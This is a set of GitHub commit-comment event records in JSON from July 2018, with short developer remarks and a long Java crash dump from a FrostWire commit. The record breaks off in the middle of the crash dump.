{"id":"7903026068","type":"CommitCommentEvent","actor":{"login":"timthelion"},"repo":{"name":"jsmesami/naovoce"},"payload":{"comment":{"id":29557981,"position":null,"line":null,"path":null,"commit_id":"f2644921f633b1df3822f7e3d9fcf51950cc5b47","created_at":"2018-07-01T13:21:02Z","updated_at":"2018-07-01T13:21:02Z","author_association":"NONE","body":"Shouldn't you have updated requirements.txt as well? Currently, Django is limited to 1.8 at the latest in the requirements file: https://github.com/jsmesami/naovoce/blob/next/requirements.txt"}},"created_at":"2018-07-01T13:21:02Z"}
{"id":"7903030085","type":"CommitCommentEvent","actor":{"login":"maxim-avramenko"},"repo":{"name":"perftools/xhgui"},"payload":{"comment":{"id":29557984,"position":null,"line":null,"path":null,"commit_id":"175dbc753fae32d0501654b309a8f106d9b22c00","created_at":"2018-07-01T13:24:13Z","updated_at":"2018-07-01T13:24:13Z","author_association":"NONE","body":"I think this is not a good idea to put more than one service in one Dockerfile, use docker-compose instead "}},"created_at":"2018-07-01T13:24:13Z"}
{"id":"7903036450","type":"CommitCommentEvent","actor":{"login":"AnnaLikhuta"},"repo":{"name":"AnnaLikhuta/Home"},"payload":{"comment":{"id":29557992,"position":null,"line":null,"path":null,"commit_id":"d886f9c5aaa3e5ec58033189c920a63f3406f8e2","created_at":"2018-07-01T13:28:45Z","updated_at":"2018-07-01T13:28:45Z","author_association":"OWNER","body":"k"}},"created_at":"2018-07-01T13:28:45Z"}
{"id":"7903036599","type":"CommitCommentEvent","actor":{"login":"maryamyasaei"},"repo":{"name":"evenset/ketabdan-project"},"payload":{"comment":{"id":29557993,"position":null,"line":null,"path":null,"commit_id":"fe2857a2d03421becf027fad9b84696444b4bc4c","created_at":"2018-07-01T13:28:52Z","updated_at":"2018-07-01T13:28:52Z","author_association":"COLLABORATOR","body":"![screenshot from 2018-07-01 23-12-34](https://user-images.githubusercontent.com/28941044/42134856-7ee41aa8-7d86-11e8-946a-15205c5b50f2.png)\r\n"}},"created_at":"2018-07-01T13:28:52Z"}
{"id":"7903036643","type":"CommitCommentEvent","actor":{"login":"spinute"},"repo":{"name":"spinute/ods"},"payload":{"comment":{"id":29557994,"position":null,"line":null,"path":null,"commit_id":"ddf475f6e99fe15d3506e3fc5a69dd4bfec4030c","created_at":"2018-07-01T13:28:54Z","updated_at":"2018-07-01T13:28:54Z","author_association":"OWNER","body":"ありがとう！XFastTrieのタイトルもそうなっているので、揃えておいてください！"}},"created_at":"2018-07-01T13:28:54Z"}
{"id":"7903037145","type":"CommitCommentEvent","actor":{"login":"GColom"},"repo":{"name":"michimichiamo/labinfo"},"payload":{"comment":{"id":29557995,"position":null,"line":null,"path":null,"commit_id":"75a336928400caa1805a7e7f3a37c9cc6d99c24e","created_at":"2018-07-01T13:29:20Z","updated_at":"2018-07-01T13:29:20Z","author_association":"NONE","body":"Can't wait for stable release!!!!"}},"created_at":"2018-07-01T13:29:20Z"}
{"id":"7903038250","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"votaguz/frostwire"},"payload":{"comment":{"id":29557999,"position":null,"line":null,"path":null,"commit_id":"db4e9536668a083b47a4812ab28d4a3a623c76c8","created_at":"2018-07-01T13:30:10Z","updated_at":"2018-07-01T13:30:10Z","author_association":"COLLABORATOR","body":"This commit has a native crash, probably converting a string from jlibtorrent (C++) into Java\r\n\r\n```\r\n#\r\n# A fatal error has been detected by the Java Runtime Environment:\r\n#\r\n#  SIGSEGV (0xb) at pc=0x000000010857a050, pid=18797, tid=48503\r\n#\r\n# JRE version: Java(TM) SE Runtime Environment (8.0_60-b27) (build 1.8.0_60-b27)\r\n# Java VM: Java HotSpot(TM) 64-Bit Server VM (25.60-b23 mixed mode bsd-amd64 compressed oops)\r\n# Problematic frame:\r\n# V  [libjvm.dylib+0x57a050]  UTF8::unicode_length(char const*)+0x4\r\n#\r\n# Failed to write core dump. Core dumps have been disabled. To enable core dumping, try \"ulimit -c unlimited\" before starting Java again\r\n#\r\n# If you would like to submit a bug report, please visit:\r\n#   http://bugreport.java.com/bugreport/crash.jsp\r\n#\r\n\r\n---------------  T H R E A D  ---------------\r\n\r\nCurrent thread (0x00007f944591c800):  JavaThread \"AWT-EventQueue-0\" [_thread_in_vm, id=48503, stack(0x000070000764a000,0x000070000774a000)]\r\n\r\nsiginfo: si_signo: 11 (SIGSEGV), si_code: 1 (SEGV_MAPERR), si_addr: 0xffffffffffffffff\r\n\r\nRegisters:\r\nRAX=0x00000001088df540, RBX=0x00007f944591c800, RCX=0x0000000108815310, RDX=0xffffffffffffffff\r\nRSP=0x0000700007746f80, RBP=0x0000700007746f80, RSI=0x00007f944591c800, RDI=0xffffffffffffffff\r\nR8 =0x00000000f80653e5, R9 =0x00000000f80653e5, R10=0x000000010c4a7928, R11=0x00000001084dc4db\r\nR12=0x0000000000000000, R13=0x000000012a003f58, R14=0xffffffffffffffff, R15=0x00007f944591c800\r\nRIP=0x000000010857a050, EFLAGS=0x0000000000010286, ERR=0x0000000000000004\r\n  TRAPNO=0x000000000000000e\r\n\r\nTop of Stack: (sp=0x0000700007746f80)\r\n0x0000700007746f80:   0000700007746fb0 00000001082f21fb\r\n0x0000700007746f90:   000000076afcb1a8 00007f944591c800\r\n0x0000700007746fa0:   00007f944591c9f8 00007f944591c800\r\n0x0000700007746fb0:   0000700007746fd0 00000001082f2262\r\n0x0000700007746fc0:   ffffffffffffffff ffffffffffffffff\r\n0x0000700007746fd0:   0000700007747030 000000010831be57\r\n0x0000700007746fe0:   0000000000000011 00007f944591c800\r\n0x0000700007746ff0:   0000000000000000 000000010d9ac268\r\n0x0000700007747000:   00000006c0049be8 00007f944591c800\r\n0x0000700007747010:   00007f944591c800 000000012a003f58\r\n0x0000700007747020:   00007000077470d0 00007f944591c800\r\n0x0000700007747030:   00007000077470a0 000000010c4a7954\r\n0x0000700007747040:   0000700007747140 00000001080d1588\r\n0x0000700007747050:   00000006c057e9d8 402e000000000000\r\n0x0000700007747060:   0000700007747060 0000000000000000\r\n0x0000700007747070:   00007000077470d0 000000012a05d5c0\r\n0x0000700007747080:   0000000000000000 000000012a003f58\r\n0x0000700007747090:   0000000000000000 00007000077470c0\r\n0x00007000077470a0:   0000700007747118 000000010c4999d0\r\n0x00007000077470b0:   00000006c00061e8 000000010c4a157b\r\n0x00007000077470c0:   0000000778e63e50 00007f944f920690\r\n0x00007000077470d0:   00000006c058bf20 00007000077470d8\r\n0x00007000077470e0:   000000018bccf8a5 0000700007747128\r\n0x00007000077470f0:   000000018bcd0308 0000000000000000\r\n0x0000700007747100:   000000018bccf8c0 00007000077470c0\r\n0x0000700007747110:   0000700007747128 0000700007747170\r\n0x0000700007747120:   000000010c4999d0 0000000778e63e50\r\n0x0000700007747130:   0000700007747130 000000018bccebcc\r\n0x0000700007747140:   0000700007747180 000000018bcced90\r\n0x0000700007747150:   0000000000000000 000000018bccebe8\r\n0x0000700007747160:   0000700007747128 0000700007747180\r\n0x0000700007747170:   00007000077471c8 000000010c4999d0 \r\n\r\nInstructions: (pc=0x000000010857a050)\r\n0x000000010857a030:   81 e2 c0 00 00 00 81 fa 80 00 00 00 0f 44 f1 48\r\n0x000000010857a040:   ff c7 48 ff c8 75 e3 89 f0 5d c3 90 55 48 89 e5\r\n0x000000010857a050:   8a 0f 84 c9 75 04 31 c0 5d c3 48 ff c7 31 c0 0f\r\n0x000000010857a060:   b6 c9 81 e1 c0 00 00 00 81 f9 80 00 00 00 0f 95 \r\n\r\nRegister to memory mapping:\r\n\r\nRAX=0x00000001088df540: _ZN20SafepointSynchronize6_stateE+0 in /Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/server/libjvm.dylib at 0x0000000108000000\r\nRBX=0x00007f944591c800 is a thread\r\nRCX=0x0000000108815310: UseMembar+0 in /Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/server/libjvm.dylib at 0x0000000108000000\r\nRDX=0xffffffffffffffff is an unknown value\r\nRSP=0x0000700007746f80 is pointing into the stack for thread: 0x00007f944591c800\r\nRBP=0x0000700007746f80 is pointing into the stack for thread: 0x00007f944591c800\r\nRSI=0x00007f944591c800 is a thread\r\nRDI=0xffffffffffffffff is an unknown value\r\nR8 =0x00000000f80653e5 is an unknown value\r\nR9 =0x00000000f80653e5 is an unknown value\r\nR10=0x000000010c4a7928 is at code_begin+808 in an Interpreter codelet\r\nmethod entry point (kind = native)  [0x000000010c4a7600, 0x000000010c4a7f00]  2304 bytes\r\nR11=0x00000001084dc4db: throw_unsatisfied_link_error+0 in /Library/Java/JavaVirtualMachines/jdk1.8.0_60.jdk/Contents/Home/jre/lib/server/libjvm.dylib at 0x0000000108000000\r\nR12=0x0000000000000000 is an unknown value\r\nR13={method} {0x000000012a003f58} 'announce_entry_url_get' '(JLcom/frostwire/jlibtorrent/swig/announce_entry;)Ljava/lang/String;' in 'com/frostwire/jlibtorrent/swig/libtorrent_jni'\r\nR14=0xffffffffffffffff is an unknown value\r\nR15=0x00007f944591c800 is a thread\r\n\r\n\r\nStack: [0x000070000764a000,0x000070000774a000],  sp=0x0000700007746f80,  free space=1011k\r\nNative frames: (J=compiled Java code, j=interpreted, Vv=VM code, C=native code)\r\nV  [libjvm.dylib+0x57a050]  UTF8::unicode_length(char const*)+0x4\r\nV  [libjvm.dylib+0x2f21fb]  java_lang_String::create_from_str(char const*, Thread*)+0x2d\r\nV  [libjvm.dylib+0x2f2262]  java_lang_String::create_oop_from_str(char const*, Thread*)+0x14\r\nV  [libjvm.dylib+0x31be57]  jni_NewStringUTF+0x66\r\nj  com.frostwire.jlibtorrent.swig.libtorrent_jni.announce_entry_url_get(JLcom/frostwire/jlibtorrent/swig/announce_entry;)Ljava/lang/String;+0\r\nj  com.frostwire.jlibtorrent.swig.announce_entry.getUrl()Ljava/lang/String;+5\r\nj  com.frostwire.jlibtorrent.AnnounceEntry.url()Ljava/lang/String;+4\r\nj  com.frostwire.gui.components.transfers.TransferDetailTrackersDataLine.getValueAt(I)Ljava/lang/Object;+57\r\nJ 7125 C2 com.limegroup.gnutella.gui.tables.BasicDataLineModel.getValueAt(II)Ljava/lang/Object; (20 bytes) @ 0x000000010c9754c8 [0x000000010c9753c0+0x108]\r\nJ 6249 C1 javax.swing.JTable.prepareRenderer(Ljavax/swing/table/TableCellRenderer;II)Ljava/awt/Component; (114 bytes) @ 0x000000010d61cb8c [0x000000010d61c160+0xa2c]\r\nJ 7124 C1 javax.swing.plaf.synth.SynthTableUI.paintCell(Ljavax/swing/plaf/synth/SynthContext;Ljava/awt/Graphics;Ljava/awt/Rectangle;II)V (182 bytes) @ 0x000000010d9b8194 [0x000000010d9b7cc0+0x4d4]\r\nJ 7174 C1 javax.swing.plaf.synth.SynthTableUI.paintCells(Ljavax/swing/plaf/synth/SynthContext;Ljava/awt/Graphics;IIII)V (349 bytes) @ 0x000000010cd246b4 [0x000000010cd23ce0+0x9d4]\r\nj  javax.swing.plaf.synth.SynthTableUI.paint(Ljavax/swing/plaf/synth/SynthContext;Ljava/awt/Graphics;)V+238\r\nj  javax.swing.plaf.synth.SynthTableUI.update(Ljava/awt/Graphics;Ljavax/swing/JComponent;)V+33\r\nJ 6960 C2 javax.swing.JComponent.paintComponent(Ljava/awt/Graphics;)V (44 bytes) @ 0x000000010d9172a0 [0x000000010d9170a0+0x200]\r\nJ 6958 C2 javax.swing.JComponent.paint(Ljava/awt/Graphics;)V (409 bytes) @ 0x000000010d92b258 [0x000000010d92a7c0+0xa98]\r\nj  com.limegroup.gnutella.gui.tables.LimeJTable.paint(Ljava/awt/Graphics;)V+2\r\nj  javax.swing.JComponent.paintToOffscreen(Ljava/awt/Graphics;IIIIII)V+41\r\nj  javax.swing.RepaintManager$PaintManager.paintDoubleBuffered(Ljavax/swing/JComponent;Ljava/awt/Image;Ljava/awt/Graphics;IIII)V+163\r\nj  javax.swing.RepaintManager$PaintManager.paint(Ljavax/swing/JComponent;Ljavax/swing/JComponent;Ljava/awt/Graphics;IIII)Z+116\r\nj  javax.swing.RepaintManager.paint(Ljavax/swing/JComponent;Ljavax/swing/JComponent;Ljava/awt/Graphics;IIII)V+51\r\nj  javax.swing.JComponent._paintImmediately(IIII)V+683\r\nj  javax.swing.JComponent.paintImmediately(IIII)V+138\r\nj  javax.swing.RepaintManager$4.run()Ljava/lang/Void;+81\r\nj  javax.swing.RepaintManager$4.run()Ljava/lang/Object;+1\r\nv  ~StubRoutines::call_stub\r\nV  [libjvm.dylib+0x2eab0e]  JavaCalls::call_helper(JavaValue*, methodHandle*, JavaCallArguments*, Thread*)+0x6ae\r\nV  [libjvm.dylib+0x34afd8]  JVM_DoPrivileged+0x4b8\r\nJ 1237  java.security.AccessController.doPrivileged(Ljava/security/PrivilegedAction;Ljava/security/AccessControlContext;)Ljava/lang/Object; (0 bytes) @ 0x000000010c89b3d5 [0x000000010c89b300+0xd5]\r\nJ 7115 C2 java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Ljava/security/PrivilegedAction;Ljava/security/AccessControlContext;Ljava/security/AccessControlContext;)Ljava/lang/Object; (22 bytes) @ 0x000000010c6b4c08 [0x000000010c6b4ac0+0x148]\r\nj  javax.swing.RepaintManager.paintDirtyRegions(Ljava/util/Map;)V+154\r\nj  javax.swing.RepaintManager.paintDirtyRegions()V+46\r\nj  javax.swing.RepaintManager.prePaintDirtyRegions()V+73\r\nj  javax.swing.RepaintManager.access$1200(Ljavax/swing/RepaintManager;)V+1\r\nj  javax.swing.RepaintManager$ProcessingRunnable.run()V+37\r\nJ 6069 C2 java.awt.EventQueue.dispatchEventImpl(Ljava/awt/AWTEvent;Ljava/lang/Object;)V (149 bytes) @ 0x000000010ca4fb00 [0x000000010ca4f860+0x2a0]\r\nJ 6077 C2 java.awt.EventQueue$3.run()Ljava/lang/Object; (5 bytes) @ 0x000000010c8f22ec [0x000000010c8f2280+0x6c]\r\nv  ~StubRoutines::call_stub\r\nV  [libjvm.dylib+0x2eab0e]  JavaCalls::call_helper(JavaValue*, methodHandle*, JavaCallArguments*, Thread*)+0x6ae\r\nV  [libjvm.dylib+0x34afd8]  JVM_DoPrivileged+0x4b8\r\nJ 1237  java.security.AccessController.doPrivileged(Ljava/security/PrivilegedAction;Ljava/security/AccessControlContext;)Ljava/lang/Object; (0 bytes) @ 0x000000010c89b3d5 [0x000000010c89b300+0xd5]\r\nJ 6067 C2 java.awt.EventQueue.dispatchEvent(Ljava/awt/AWTEvent;)V (80 bytes) @ 0x000000010ca4df50 [0x000000010ca4dd00+0x250]\r\nJ 6651 C1 java.awt.EventDispatchThread.pumpOneEventForFilters(I)V (295 bytes) @ 0x000000010d7d6164 [0x000000010d7d4500+0x1c64]\r\nj  java.awt.EventDispatchThread.pumpEventsForFilter(ILjava/awt/Conditional;Ljava/awt/EventFilter;)V+35\r\nj  java.awt.EventDispatchThread.pumpEventsForHierarchy(ILjava/awt/Conditional;Ljava/awt/Component;)V+11\r\nj  java.awt.EventDispatchThread.pumpEvents(ILjava/awt/Conditional;)V+4\r\nj  java.awt.EventDispatchThread.pumpEvents(Ljava/awt/Conditional;)V+3\r\nj  java.awt.EventDispatchThread.run()V+9\r\nv  ~StubRoutines::call_stub\r\nV  [libjvm.dylib+0x2eab0e]  JavaCalls::call_helper(JavaValue*, methodHandle*, JavaCallArguments*, Thread*)+0x6ae\r\nV  [libjvm.dylib+0x2eb29c]  JavaCalls::call_virtual(JavaValue*, KlassHandle, Symbol*, Symbol*, JavaCallArguments*, Thread*)+0x164\r\nV  [libjvm.dylib+0x2eb448]  JavaCalls::call_virtual(JavaValue*, Handle, KlassHandle, Symbol*, Symbol*, Thread*)+0x4a\r\nV  [libjvm.dylib+0x345965]  thread_entry(JavaThread*, Thread*)+0x7c\r\nV  [libjvm.dylib+0x5612d3]  JavaThread::thread_main_inner()+0x9b\r\nV  [libjvm.dylib+0x5629ce]  JavaThread::run()+0x1c2\r\nV  [libjvm.dylib+0x48343a]  java_start(Thread*)+0xf6\r\nC  [libsystem_pthread.dylib+0x3661]  _pthread_body+0x154\r\nC  [libsystem_pthread.dylib+0x350d]  _pthread_body+0x0\r\nC  [libsystem_pthread.dylib+0x2bf9]  thread_start+0xd\r\nC  0x0000000000000000\r\n\r\nJava frames: (J=compiled Java code, j=interpreted, Vv=VM code)\r\nj  com.frostwire.jlibtorrent.swig.libtorrent_jni.announce_entry_url_get(JLcom/frostwire/jlibtorrent/swig/announce_entry;)Ljava/lang/String;+0\r\nj  com.frostwire.jlibtorrent.swig.announce_entry.getUrl()Ljava/lang/String;+5\r\nj  com.frostwire.jlibtorrent.AnnounceEntry.url()Ljava/lang/String;+4\r\nj  com.frostwire.gui.components.transfers.TransferDetailTrackersDataLine.getValueAt(I)Ljava/lang/Object;+57\r\nJ 7125 C2 com.limegroup.gnutella.gui.tables.BasicDataLineModel.getValueAt(II)Ljava/lang/Object; (20 bytes) @ 0x000000010c9754c8 [0x000000010c9753c0+0x108]\r\nJ 6249 C1 javax.swing.JTable.prepareRenderer(Ljavax/swing/table/TableCellRenderer;II)Ljava/awt/Component; (114 bytes) @ 0x000000010d61cb8c [0x000000010d61c160+0xa2c]\r\nJ 7124 C1 javax.swing.plaf.synth.SynthTableUI.paintCell(Ljavax/swing/plaf/synth/SynthContext;Ljava/awt/Graphics;Ljava/awt/Rectangle;II)V (182 bytes) @ 0x000000010d9b8194 [0x000000010d9b7cc0+0x4d4]\r\nJ 7174 C1 javax.swing.plaf.synth.SynthTableUI.paintCells(Ljavax/swing/plaf/synth/SynthContext;Ljava/awt/Graphics;IIII)V (349 bytes) @ 0x000000010cd246b4 [0x000000010cd23ce0+0x9d4]\r\nj  javax.swing.plaf.synth.SynthTableUI.paint(Ljavax/swing/plaf/synth/SynthContext;Ljava/awt/Graphics;)V+238\r\nj  javax.swing.plaf.synth.SynthTableUI.update(Ljava/awt/Graphics;Ljavax/swing/JComponent;)V+33\r\nJ 6960 C2 javax.swing.JComponent.paintComponent(Ljava/awt/Graphics;)V (44 bytes) @ 0x000000010d9172a0 [0x000000010d9170a0+0x200]\r\nJ 6958 C2 javax.swing.JComponent.paint(Ljava/awt/Graphics;)V (409 bytes) @ 0x000000010d92b258 [0x000000010d92a7c0+0xa98]\r\nj  com.limegroup.gnutella.gui.tables.LimeJTable.paint(Ljava/awt/Graphics;)V+2\r\nj  javax.swing.JComponent.paintToOffscreen(Ljava/awt/Graphics;IIIIII)V+41\r\nj  javax.swing.RepaintManager$PaintManager.paintDoubleBuffered(Ljavax/swing/JComponent;Ljava/awt/Image;Ljava/awt/Graphics;IIII)V+163\r\nj  javax.swing.RepaintManager$PaintManager.paint(Ljavax/swing/JComponent;Ljavax/swing/JComponent;Ljava/awt/Graphics;IIII)Z+116\r\nj  javax.swing.RepaintManager.paint(Ljavax/swing/JComponent;Ljavax/swing/JComponent;Ljava/awt/Graphics;IIII)V+51\r\nj  javax.swing.JComponent._paintImmediately(IIII)V+683\r\nj  javax.swing.JComponent.paintImmediately(IIII)V+138\r\nj  javax.swing.RepaintManager$4.run()Ljava/lang/Void;+81\r\nj  javax.swing.RepaintManager$4.run()Ljava/lang/Object;+1\r\nv  ~StubRoutines::call_stub\r\nJ 1237  java.security.AccessController.doPrivileged(Ljava/security/PrivilegedAction;Ljava/security/AccessControlContext;)Ljava/lang/Object; (0 bytes) @ 0x000000010c89b363 [0x000000010c89b300+0x63]\r\nJ 7115 C2 java.security.ProtectionDomain$JavaSecurityAccessImpl.doIntersectionPrivilege(Ljava/security/PrivilegedAction;Ljava/security/AccessControlContext;Ljava/security/AccessControlContext;)Ljava/lang/Object; (22 bytes) @ 0x000000010c6b4c08 [0x000000010c6b4ac0+0x148]\r\nj  javax.swing.RepaintManager.paintDirtyRegions(Ljava/util/Map;)V+154\r\nj  javax.swing.RepaintManager.paintDirtyRegions()V+46\r\nj  javax.swing.RepaintManager.prePaintDirtyRegions()V+73\r\nj  javax.swing.RepaintManager.access$1200(Ljavax/swing/RepaintManager;)V+1\r\nj  javax.swing.RepaintManager$ProcessingRunnable.run()V+37\r\nJ 6069 C2 java.awt.EventQueue.dispatchEventImpl(Ljava/awt/AWTEvent;Ljava/lang/Object;)V (149 bytes) @ 0x000000010ca4fb00 [0x000000010ca4f860+0x2a0]\r\nJ 6077 C2 java.awt.EventQueue$3.run()Ljava/lang/Object; (5 bytes) @ 0x000000010c8f22ec [0x000000010c8f2280+0x6c]\r\nv  ~StubRoutines::call_stub\r\nJ 1237  java.security.AccessController.doPrivileged(Ljava/security/PrivilegedAction;Ljava/security/AccessControlContext;)Ljava/lang/Object; (0 bytes) @ 0x000000010c89b363 [0x000000010c89b300+0x63]\r\nJ 6067 C2 java.awt.EventQueue.dispatchEvent(Ljava/awt/AWTEvent;)V (80 bytes) @ 0x000000010ca4df50 [0x000000010ca4dd00+0x250]\r\nJ 6651 C1 java.awt.EventDispatchThread.pumpOneEventForFilters(I)V (295 bytes) @ 0x000000010d7d6164 [0x000000010d7d4500+0x1c64]\r\nj  java.awt.EventDispatchThread.pumpEventsForFilter(ILjava/awt/Conditional;Ljava/awt/EventFilter;)V+35\r\nj  java.awt.EventDispatchThread.pumpEventsForHierarchy(ILjava/awt/Conditional;Ljava/awt/Component;)V+11\r\nj  java.awt.EventDispatchThread.pumpEvents(ILjava/awt/Conditional;)V+4\r\nj  java.awt.EventDispatchThread.pumpEvents(Ljava/awt/Conditional;)V+3\r\nj  java.awt.EventDispatchThread.run()V+9\r\nv  ~StubRoutines::call_stub\r\n\r\n---------------  P R O C E S S  ---------------\r\n\r\nJava Threads: ( => current thread )\r\n  0x00007f9446a0b000 JavaThread \"GUIMediator-updateConnectionQuality-thread-idle\" daemon [_thread_blocked, id=127763, stack(0x00007000092d2000,0x00007000093d2000)]\r\n  0x00007f9447111800 JavaThread \"DestroyJavaVM\" [_thread_blocked, id=6403, stack(0x0000700005e7c000,0x0000700005f7c000)]\r\n  0x00007f94472ae800 JavaThread \"ManualGC\" daemon [_thread_blocked, id=89603, stack(0x0000700008e43000,0x0000700008f43000)]\r\n  0x00007f94466dc800 JavaThread \"SlideShow Timer\" [_thread_blocked, id=58151, stack(0x0000700008600000,0x0000700008700000)]\r\n  0x00007f944b816800 JavaThread \"MVStore background writer nio:/Users/gubatron/Library/Preferences/FrostWire5/dbs/crawldb.1/crawldb.mv.db\" daemon [_thread_blocked, id=68623, stack(0x00007000080f1000,0x00007000081f1000)]\r\n  0x00007f9446222800 JavaThread \"VPNStatusRefresher-thread-idle\" daemon [_thread_blocked, id=129795, stack(0x0000700008b3a000,0x0000700008c3a000)]\r\n  0x00007f944501c800 JavaThread \"Okio Watchdog\" daemon [_thread_blocked, id=130051, stack(0x0000700008a37000,0x0000700008b37000)]\r\n  0x00007f9443659000 JavaThread \"OkHttp ConnectionPool\" daemon [_thread_blocked, id=87811, stack(0x0000700008934000,0x0000700008a34000)]\r\n  0x00007f94465d2000 JavaThread \"MPlayer output parser\" daemon [_thread_blocked, id=87555, stack(0x0000700008831000,0x0000700008931000)]\r\n  0x00007f9445f3b000 JavaThread \"process reaper\" daemon [_thread_blocked, id=87299, stack(0x0000700008806000,0x000070000882e000)]\r\n  0x00007f94432d7800 JavaThread \"MVStore background writer nio:/Users/gubatron/Library/Preferences/FrostWire5/library_db/library_db.mv.db\" daemon [_thread_blocked, id=67591, stack(0x00007000084fd000,0x00007000085fd000)]\r\n  0x00007f94453b5000 JavaThread \"TimerQueue\" daemon [_thread_blocked, id=65539, stack(0x00007000081f4000,0x00007000082f4000)]\r\n  0x00007f9445ed7800 JavaThread \"SessionManager-alertsLoop\" daemon [_thread_in_native, id=64259, stack(0x0000700007eeb000,0x0000700007feb000)]\r\n  0x00007f9445b4d800 JavaThread \"Deadlock Detection Thread\" daemon [_thread_blocked, id=70659, stack(0x0000700007ad9000,0x0000700007bd9000)]\r\n  0x00007f9445b4c800 JavaThread \"Thread-2\" [_thread_in_native, id=61727, stack(0x00007000079d6000,0x0000700007ad6000)]\r\n  0x00007f944592d000 JavaThread \"Java2D Queue Flusher\" daemon [_thread_blocked, id=79367, stack(0x0000700007850000,0x0000700007950000)]\r\n  0x00007f9443132000 JavaThread \"Java2D Disposer\" daemon [_thread_blocked, id=51971, stack(0x000070000774d000,0x000070000784d000)]\r\n=>0x00007f944591c800 JavaThread \"AWT-EventQueue-0\" [_thread_in_vm, id=48503, stack(0x000070000764a000,0x000070000774a000)]\r\n  0x00007f94458da000 JavaThread \"AWT-Shutdown\" [_thread_blocked, id=26923, stack(0x00007000072b8000,0x00007000073b8000)]\r\n  0x00007f9447054800 JavaThread \"AppKit Thread\" daemon [_thread_in_native, id=775, stack(0x00007ffee84e5000,0x00007ffee8ce5000)]\r\n  0x00007f9443800800 JavaThread \"Service Thread\" daemon [_thread_blocked, id=16131, stack(0x00007000070b2000,0x00007000071b2000)]\r\n  0x00007f9443819000 JavaThread \"C1 CompilerThread3\" daemon [_thread_blocked, id=16643, stack(0x0000700006faf000,0x00007000070af000)]\r\n  0x00007f9443818800 JavaThread \"C2 CompilerThread2\" daemon [_thread_blocked, id=15875, stack(0x0000700006eac000,0x0000700006fac000)]\r\n  0x00007f94450d8800 JavaThread \"C2 CompilerThread1\" daemon [_thread_blocked, id=15619, stack(0x0000700006da9000,0x0000700006ea9000)]\r\n  0x00007f94450d7800 JavaThread \"C2 CompilerThread0\" daemon [_thread_blocked, id=17667, stack(0x0000700006ca6000,0x0000700006da6000)]\r\n  0x00007f94450d6800 JavaThread \"Monitor Ctrl-Break\" daemon [_thread_in_native, id=15107, stack(0x0000700006ba3000,0x0000700006ca3000)]\r\n  0x00007f9446002800 JavaThread \"Signal Dispatcher\" daemon [_thread_blocked, id=17931, stack(0x0000700006aa0000,0x0000700006ba0000)]\r\n  0x00007f9445811800 JavaThread \"Finalizer\" daemon [_thread_blocked, id=12547, stack(0x000070000699d000,0x0000700006a9d000)]\r\n  0x00007f9445810800 JavaThread \"Reference Handler\" daemon [_thread_blocked, id=19459, stack(0x000070000689a000,0x000070000699a000)]\r\n\r\nOther Threads:\r\n  0x00007f9445810000 VMThread [stack: 0x0000700006797000,0x0000700006897000] [id=19971]\r\n  0x00007f9443801800 WatcherThread [stack: 0x00007000071b5000,0x00007000072b5000] [id=22019]\r\n\r\nVM state:not at safepoint (normal execution)\r\n\r\nVM Mutex/Monitor currently owned by a thread: None\r\n\r\nHeap:\r\n PSYoungGen      total 252416K, used 24771K [0x000000076ab00000, 0x000000077e400000, 0x00000007c0000000)\r\n  eden space 228864K, 2% used [0x000000076ab00000,0x000000076b19f140,0x0000000778a80000)\r\n  from space 23552K, 76% used [0x0000000778a80000,0x0000000779c11c10,0x000000077a180000)\r\n  to   space 24576K, 0% used [0x000000077cc00000,0x000000077cc00000,0x000000077e400000)\r\n ParOldGen       total 131072K, used 24954K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 19% used [0x00000006c0000000,0x00000006c185e988,0x00000006c8000000)\r\n Metaspace       used 39999K, capacity 40428K, committed 40832K, reserved 1085440K\r\n  class space    used 5123K, capacity 5246K, committed 5248K, reserved 1048576K\r\n\r\nCard table byte_map: [0x0000000109392000,0x0000000109b93000] byte_map_base: 0x0000000105d92000\r\n\r\nMarking Bits: (ParMarkBitMap*) 0x00000001088dee20\r\n Begin Bits: [0x000000011b492000, 0x000000011f492000)\r\n End Bits:   [0x000000011f492000, 0x0000000123492000)\r\n\r\nPolling page: 0x0000000106f9f000\r\n\r\nCodeCache: size=245760Kb used=21860Kb max_used=21867Kb free=223899Kb\r\n bounds [0x000000010c492000, 0x000000010da32000, 0x000000011b492000]\r\n total_blobs=7222 nmethods=6453 adapters=678\r\n compilation: enabled\r\n\r\nCompilation events (10 events):\r\nEvent: 21.497 Thread 0x00007f9443819000 7223       3       java.awt.geom.RoundRectangle2D::<init> (5 bytes)\r\nEvent: 21.498 Thread 0x00007f9443819000 nmethod 7223 0x000000010ce76f10 code [0x000000010ce77080, 0x000000010ce77290]\r\nEvent: 21.498 Thread 0x00007f9443819000 7220       3       javax.swing.plaf.synth.SynthButtonUI::getSynthIcon (36 bytes)\r\nEvent: 21.498 Thread 0x00007f9443818800 7224       4       sun.font.FontDesignMetrics::getHeight (35 bytes)\r\nEvent: 21.498 Thread 0x00007f9443819000 nmethod 7220 0x000000010cd338d0 code [0x000000010cd33b40, 0x000000010cd34c48]\r\nEvent: 21.498 Thread 0x00007f9443819000 7221       3       sun.awt.image.SunVolatileImage::createGraphics (27 bytes)\r\nEvent: 21.498 Thread 0x00007f9443818800 nmethod 7224 0x000000010c983290 code [0x000000010c9833e0, 0x000000010c9834b8]\r\nEvent: 21.499 Thread 0x00007f9443819000 nmethod 7221 0x000000010c66b210 code [0x000000010c66b3e0, 0x000000010c66bb38]\r\nEvent: 21.499 Thread 0x00007f9443819000 7225   !   3       sun.dc.pr.Rasterizer::appendCubic (55 bytes)\r\nEvent: 21.499 Thread 0x00007f9443819000 nmethod 7225 0x000000010c6ecd50 code [0x000000010c6ecf00, 0x000000010c6ed338]\r\n\r\nGC Heap History (10 events):\r\nEvent: 6.063 GC heap before\r\n{Heap before GC invocations=7 (full 2):\r\n PSYoungGen      total 125440K, used 114688K [0x000000076ab00000, 0x0000000773280000, 0x00000007c0000000)\r\n  eden space 114688K, 100% used [0x000000076ab00000,0x0000000771b00000,0x0000000771b00000)\r\n  from space 10752K, 0% used [0x0000000772580000,0x0000000772580000,0x0000000773000000)\r\n  to   space 10752K, 0% used [0x0000000771b00000,0x0000000771b00000,0x0000000772580000)\r\n ParOldGen       total 131072K, used 12124K [0x00000006c0000000, 0x00000006c8000000, 0x000000076ab00000)\r\n  object space 131072K, 9% used 